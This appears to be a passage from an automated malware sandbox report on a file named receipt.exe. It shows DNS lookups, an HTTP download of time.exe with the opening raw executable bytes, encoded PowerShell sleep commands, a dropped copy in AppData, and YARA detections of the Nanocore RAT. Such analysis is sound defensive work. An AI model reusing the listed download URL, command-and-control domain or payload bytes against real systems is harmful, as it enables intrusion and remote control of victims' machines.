                          Sep 29, 2022 00:54:15.494172096 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.494182110 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.494199038 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.494205952 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.494216919 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.494225025 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.494235992 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.494246960 CEST4968580192.168.2.3192.185.215.87
                          Sep 29, 2022 00:54:15.494252920 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.494271040 CEST8049685192.185.215.87192.168.2.3
                          Sep 29, 2022 00:54:15.494277954 CEST4968580192.168.2.3192.185.215.87
                          TimestampSource PortDest PortSource IPDest IP
                          Sep 29, 2022 00:54:14.735024929 CEST6372253192.168.2.38.8.8.8
                          Sep 29, 2022 00:54:14.886632919 CEST53637228.8.8.8192.168.2.3
                          Sep 29, 2022 00:54:37.038392067 CEST6552253192.168.2.38.8.8.8
                          Sep 29, 2022 00:54:37.148576021 CEST53655228.8.8.8192.168.2.3
                          Sep 29, 2022 00:54:41.760740042 CEST5986953192.168.2.38.8.8.8
                          Sep 29, 2022 00:54:41.866166115 CEST53598698.8.8.8192.168.2.3
                          Sep 29, 2022 00:54:46.404733896 CEST5439753192.168.2.38.8.8.8
                          Sep 29, 2022 00:54:46.514978886 CEST53543978.8.8.8192.168.2.3
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Sep 29, 2022 00:54:14.735024929 CEST192.168.2.38.8.8.80x6c69Standard query (0)servproviders.com.brA (IP address)IN (0x0001)false
                          Sep 29, 2022 00:54:37.038392067 CEST192.168.2.38.8.8.80x56f2Standard query (0)uzu.duckdns.orgA (IP address)IN (0x0001)false
                          Sep 29, 2022 00:54:41.760740042 CEST192.168.2.38.8.8.80x4477Standard query (0)uzu.duckdns.orgA (IP address)IN (0x0001)false
                          Sep 29, 2022 00:54:46.404733896 CEST192.168.2.38.8.8.80x761bStandard query (0)uzu.duckdns.orgA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Sep 29, 2022 00:54:14.886632919 CEST8.8.8.8192.168.2.30x6c69No error (0)servproviders.com.br192.185.215.87A (IP address)IN (0x0001)false
                          Sep 29, 2022 00:54:37.148576021 CEST8.8.8.8192.168.2.30x56f2No error (0)uzu.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
                          Sep 29, 2022 00:54:41.866166115 CEST8.8.8.8192.168.2.30x4477No error (0)uzu.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
                          Sep 29, 2022 00:54:46.514978886 CEST8.8.8.8192.168.2.30x761bNo error (0)uzu.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
                          • servproviders.com.br
                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.349685192.185.215.8780C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe
                          TimestampkBytes transferredDirectionData
                          Sep 29, 2022 00:54:15.078150988 CEST103OUTGET /time.exe HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                          Host: servproviders.com.br
                          Connection: Keep-Alive
                          Sep 29, 2022 00:54:15.219769955 CEST104INHTTP/1.1 200 OK
                          Date: Wed, 28 Sep 2022 22:54:15 GMT
                          Server: Apache
                          Upgrade: h2,h2c
                          Connection: Upgrade
                          Last-Modified: Mon, 12 Sep 2022 12:14:40 GMT
                          Accept-Ranges: bytes
                          Content-Length: 8177152
                          Content-Type: application/x-msdownload
                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fa 95 65 d9 be f4 0b 8a be f4 0b 8a be f4 0b 8a 0a 68 fa 8a a0 f4 0b 8a 0a 68 f8 8a 79 f4 0b 8a 0a 68 f9 8a 9a f4 0b 8a 20 54 cc 8a b8 f4 0b 8a 85 aa 08 8b a2 f4 0b 8a 29 86 0f 8b d9 f5 0b 8a 29 aa 0e 8b b4 f4 0b 8a 29 aa 0f 8b e2 f4 0b 8a 63 0b db 8a ba f4 0b 8a 63 0b da 8a bf f4 0b 8a 63 0b c0 8a bd f4 0b 8a be f4 0a 8a fb f6 0b 8a 5b ad 0e 8b bc f4 0b 8a 63 0b c5 8a bb f4 0b 8a 85 aa 0f 8b 94 f4 0b 8a 85 aa 0e 8b 3b f4 0b 8a 29 aa 02 8b 34 f4 0b 8a 2c aa f4 8a bf f4 0b 8a 29 aa 09 8b bf f4 0b 8a 52 69 63 68 be f4 0b 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 c4 d4 db 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 e2 2d 00 00 e0 4e 00 00 00 00 00 52 97 28 00 00 10 00 00 00 00 2e 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 7d 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 a8 38 00 28 00 00 00 00 90 3a 00 28 9c 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 7b 00 cc 4a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 95 34 00 18 00 00 00 d0 a0 32 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 00 d8 03 00 00 5c 8b 38 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3d e1 2d 00 00 10 00 00 00 e2 2d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 66 bf 0a 00 00 00 2e 00 00 c0 0a 00 00 e6 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 9c 01 00 00 c0 38 00 00 22 01 00 00 a6 38 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 f8 11 00 00 00 60 3a 00 00 12 00 00 00 c8 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 09 00 00 00 00 80 3a 00 00 02 00 00 00 da 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 9c 40 00 00 90 3a 00 00 9e 40 00 00 dc 39 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 cc 4a 02 00 00 30 7b 00 00 4c 02 00 00 7a 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 ec 96 6b 00 e8 e2 7e 2b 00 a1 a0 55 7a 00 a8 01 75 2e
                          Data Ascii: MZ@H!L!This program cannot be run in DOS mode.$ehhyh T)))ccc[c;)4,)RichPEL`-NR(.@}8(:(@0{J42@.\8.text=-- `.rdataf.-@@.data8"8@.gfids`:9@@.tls:9@.rsrc(@:@9@@.relocJ0{Lzz@Bk~+Uzu.


                          Click to jump to process

                          Target ID:0
                          Start time:00:52:13
                          Start date:29/09/2022
                          Path:C:\Users\user\Desktop\receipt.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\receipt.exe"
                          Imagebase:0xbf0000
                          File size:1505280 bytes
                          MD5 hash:220925C99E482FD480DEDB37CA1B59D3
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.356142164.0000000005630000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.346028348.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000003.338895273.00000000041C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.345187251.0000000002FCB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low

                          Target ID:2
                          Start time:00:52:24
                          Start date:29/09/2022
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
                          Imagebase:0xde0000
                          File size:430592 bytes
                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          Target ID:3
                          Start time:00:52:24
                          Start date:29/09/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff745070000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:11
                          Start time:00:52:52
                          Start date:29/09/2022
                          Path:C:\Users\user\Desktop\receipt.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\Desktop\receipt.exe
                          Imagebase:0x10000
                          File size:1505280 bytes
                          MD5 hash:220925C99E482FD480DEDB37CA1B59D3
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low

                          Target ID:12
                          Start time:00:52:52
                          Start date:29/09/2022
                          Path:C:\Users\user\Desktop\receipt.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\Desktop\receipt.exe
                          Imagebase:0x8e0000
                          File size:1505280 bytes
                          MD5 hash:220925C99E482FD480DEDB37CA1B59D3
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000003.354725575.0000000004133000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.552831356.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.552831356.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000C.00000002.552831356.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000002.548032095.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000002.575412932.00000000054AB000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.563939937.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.563939937.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.563939937.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000C.00000002.563939937.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000003.352308180.0000000003E96000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low

                          Target ID:13
                          Start time:00:53:03
                          Start date:29/09/2022
                          Path:C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe"
                          Imagebase:0x4f0000
                          File size:1505280 bytes
                          MD5 hash:220925C99E482FD480DEDB37CA1B59D3
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.489168945.0000000002AB5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.486429428.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          Reputation:low

                          Target ID:14
                          Start time:00:53:12
                          Start date:29/09/2022
                          Path:C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe"
                          Imagebase:0x690000
                          File size:1505280 bytes
                          MD5 hash:220925C99E482FD480DEDB37CA1B59D3
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000E.00000002.514450713.0000000002B9F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000E.00000002.518107476.0000000002C55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low

                          Target ID:15
                          Start time:00:53:16
                          Start date:29/09/2022
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
                          Imagebase:0xde0000
                          File size:430592 bytes
                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          Target ID:16
                          Start time:00:53:16
                          Start date:29/09/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff745070000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:17
                          Start time:00:53:33
                          Start date:29/09/2022
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
                          Imagebase:0xde0000
                          File size:430592 bytes
                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          Target ID:18
                          Start time:00:53:33
                          Start date:29/09/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff745070000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:21
                          Start time:00:53:41
                          Start date:29/09/2022
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
                          Imagebase:0xde0000
                          File size:430592 bytes
                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:.Net C# or VB.NET

                          Target ID:22
                          Start time:00:53:41
                          Start date:29/09/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff745070000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language

                          Target ID:23
                          Start time:00:53:57
                          Start date:29/09/2022
                          Path:C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe
                          Imagebase:0xcb0000
                          File size:1505280 bytes
                          MD5 hash:220925C99E482FD480DEDB37CA1B59D3
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000017.00000002.595827301.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000017.00000002.605315953.00000000032C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                          Target ID:24
                          Start time:00:54:07
                          Start date:29/09/2022
                          Path:C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe
                          Imagebase:0xe50000
                          File size:1505280 bytes
                          MD5 hash:220925C99E482FD480DEDB37CA1B59D3
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000018.00000002.605861442.0000000003464000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000018.00000002.598901171.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                          Target ID:25
                          Start time:00:54:12
                          Start date:29/09/2022
                          Path:C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe"
                          Imagebase:0x2b0000
                          File size:236032 bytes
                          MD5 hash:75C8427471203E42A905F099D986BAE4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 100%, Avira

                          Target ID:26
                          Start time:00:54:14
                          Start date:29/09/2022
                          Path:C:\Users\user\Desktop\receipt.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\Desktop\receipt.exe
                          Imagebase:0xc20000
                          File size:1505280 bytes
                          MD5 hash:220925C99E482FD480DEDB37CA1B59D3
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: NanoCore, Description: unknown, Source: 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001A.00000002.601877963.0000000003223000.00000004.00000800.00020000.00000000.sdmp, Author: unknown

                          No disassembly